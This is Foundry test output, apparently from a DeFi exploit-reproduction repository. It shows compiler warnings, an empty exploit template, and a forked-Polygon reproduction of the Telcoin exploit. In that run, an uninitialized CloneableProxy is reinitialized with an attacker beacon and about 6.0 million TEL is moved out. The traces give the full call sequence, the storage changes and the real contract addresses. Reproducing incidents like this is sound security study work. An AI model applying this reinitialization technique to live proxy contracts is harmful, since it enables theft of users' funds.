Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 499.06ms (1.89ms CPU time)

Ran 1 test for src/test/2023-12/Telcoin_exp.sol:ContractTest
[PASS] testExploit() (gas: 97362)
Logs:
  Attacker TEL balance before exploit: 0.00
  ----------------------------------------------------------------
  CloneableProxy#1 storage packed slot 0 contents before exploit and reinitialization: 0xa260d3506d4bae68003000240001000000000000000001000040001000000000
  ----------------------------------------------------------------
  CloneableProxy#1 storage packed slot 0 contents before exploit and reinitialization (two least significant bytes): uint8 _initializing: 0, bool _initialized: 0
  ----------------------------------------------------------------
  ---Exploit Time---
  ----------------------------------------------------------------
  CloneableProxy#1 storage packed slot 0 contents after exploit and reinitialization: 0xa260d3506d4bae68003000240001000000000000000001000040001000000001
  ----------------------------------------------------------------
  CloneableProxy#1 storage packed slot 0 contents after exploit and reinitialization (two least significant bytes): uint8 _initializing: 0, bool _initialized: 1
  ----------------------------------------------------------------
  Attacker TEL balance after exploit: 6018296.75

Traces:
  [5098] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("polygon", 51546495 [5.154e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(CloneableProxy#1: [0x56BCADff30680EBB540a84D75c182A5dC61981C0], "CloneableProxy#1")
    │   └─ ← [Return]
    ├─ [0] VM::label(TEL: [0xdF7837DE1F2Fa4631D716CF2502f8b230F1dcc32], "TEL")
    │   └─ ← [Return]
    └─ ← [Stop]

  [102162] ContractTest::testExploit()
    ├─ [7940] TEL::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2586] 0x805b70339183f9A98cC7fcB35fCbeb5Ac10713EA::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [3276] TEL::decimals() [staticcall]
    │   ├─ [2428] 0x805b70339183f9A98cC7fcB35fCbeb5Ac10713EA::decimals() [delegatecall]
    │   │   └─ ← [Return] 2
    │   └─ ← [Return] 2
    ├─ emit log_named_decimal_uint(key: "Attacker TEL balance before exploit", val: 0, decimals: 2)
    ├─ [0] VM::load(CloneableProxy#1: [0x56BCADff30680EBB540a84D75c182A5dC61981C0], 0x0000000000000000000000000000000000000000000000000000000000000000) [staticcall]
    │   └─ ← [Return] 0xa260d3506d4bae68003000240001000000000000000001000040001000000000
    ├─ [0] console::log("----------------------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ emit log_named_bytes32(key: "CloneableProxy#1 storage packed slot 0 contents before exploit and reinitialization", val: 0xa260d3506d4bae68003000240001000000000000000001000040001000000000)
    ├─ [0] console::log("----------------------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("CloneableProxy#1 storage packed slot 0 contents before exploit and reinitialization (two least significant bytes): uint8 _initializing: %s, bool _initialized: %s", 0, 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("----------------------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("---Exploit Time---") [staticcall]
    │   └─ ← [Stop]
    ├─ [50662] CloneableProxy#1::initialize(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xed92c6c4)
    │   ├─ [47975] 0x10d0E9755C67Ab37089aCb4f51E8b4eE407FE853::initialize(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xed92c6c4) [delegatecall]
    │   │   ├─ [424] ContractTest::implementation() [staticcall]
    │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   ├─ emit BeaconUpgraded(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ [424] ContractTest::implementation() [staticcall]
    │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   ├─ [32319] ContractTest::transferTELFromCloneableProxy() [delegatecall]
    │   │   │   ├─ [3440] TEL::balanceOf(CloneableProxy#1: [0x56BCADff30680EBB540a84D75c182A5dC61981C0]) [staticcall]
    │   │   │   │   ├─ [2586] 0x805b70339183f9A98cC7fcB35fCbeb5Ac10713EA::balanceOf(CloneableProxy#1: [0x56BCADff30680EBB540a84D75c182A5dC61981C0]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 601829675 [6.018e8]
    │   │   │   │   └─ ← [Return] 601829675 [6.018e8]
    │   │   │   ├─ [27176] TEL::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 601829675 [6.018e8])
    │   │   │   │   ├─ [26316] 0x805b70339183f9A98cC7fcB35fCbeb5Ac10713EA::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 601829675 [6.018e8]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: CloneableProxy#1: [0x56BCADff30680EBB540a84D75c182A5dC61981C0], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 601829675 [6.018e8])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x10871d54c0553015e72421c672d3552fdcf7519bede679ac69ad47ffd791afe1: 0x0000000000000000000000000000000000000000000000000000000023df312b → 0
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000023df312b
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0xa260d3506d4bae68003000240001000000000000000001000040001000000000 → 0xa260d3506d4bae68003000240001000000000000000001000040001000000001
    │   │   │   @ 0xa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d50: 0x0000000000000000000000003f443c31dab3dab882f9fe621f97b74c3c14837d → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000023df312b
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [0] VM::load(CloneableProxy#1: [0x56BCADff30680EBB540a84D75c182A5dC61981C0], 0x0000000000000000000000000000000000000000000000000000000000000000) [staticcall]
    │   └─ ← [Return] 0xa260d3506d4bae68003000240001000000000000000001000040001000000001
    ├─ [0] console::log("----------------------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ emit log_named_bytes32(key: "CloneableProxy#1 storage packed slot 0 contents after exploit and reinitialization", val: 0xa260d3506d4bae68003000240001000000000000000001000040001000000001)
    ├─ [0] console::log("----------------------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("CloneableProxy#1 storage packed slot 0 contents after exploit and reinitialization (two least significant bytes): uint8 _initializing: %s, bool _initialized: %s", 0, 1) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("----------------------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [1440] TEL::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [586] 0x805b70339183f9A98cC7fcB35fCbeb5Ac10713EA::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 601829675 [6.018e8]
    │   └─ ← [Return] 601829675 [6.018e8]
    ├─ [1276] TEL::decimals() [staticcall]
    │   ├─ [428] 0x805b70339183f9A98cC7fcB35fCbeb5Ac10713EA::decimals() [delegatecall]
    │   │   └─ ← [Return] 2
    │   └─ ← [Return] 2
    ├─ emit log_named_decimal_uint(key: "Attacker TEL balance after exploit", val: 601829675 [6.018e8], decimals: 2)
    ├─ [0] VM::expectRevert(custom error 0xf28dceb3:  .Initializable: contract is already initialized)
    │   └─ ← [Return]
    ├─ [1970] CloneableProxy#1::initialize(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [1772] 0x10d0E9755C67Ab37089aCb4f51E8b4eE407FE853::initialize(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x) [delegatecall]
    │   │   └─ ← [Revert] revert: Initializable: contract is already initialized
    │   └─ ← [Revert] revert: Initializable: contract is already initialized
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.10s (1.84s CPU time)

Ran 2 test suites in 3.91s (3.60s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
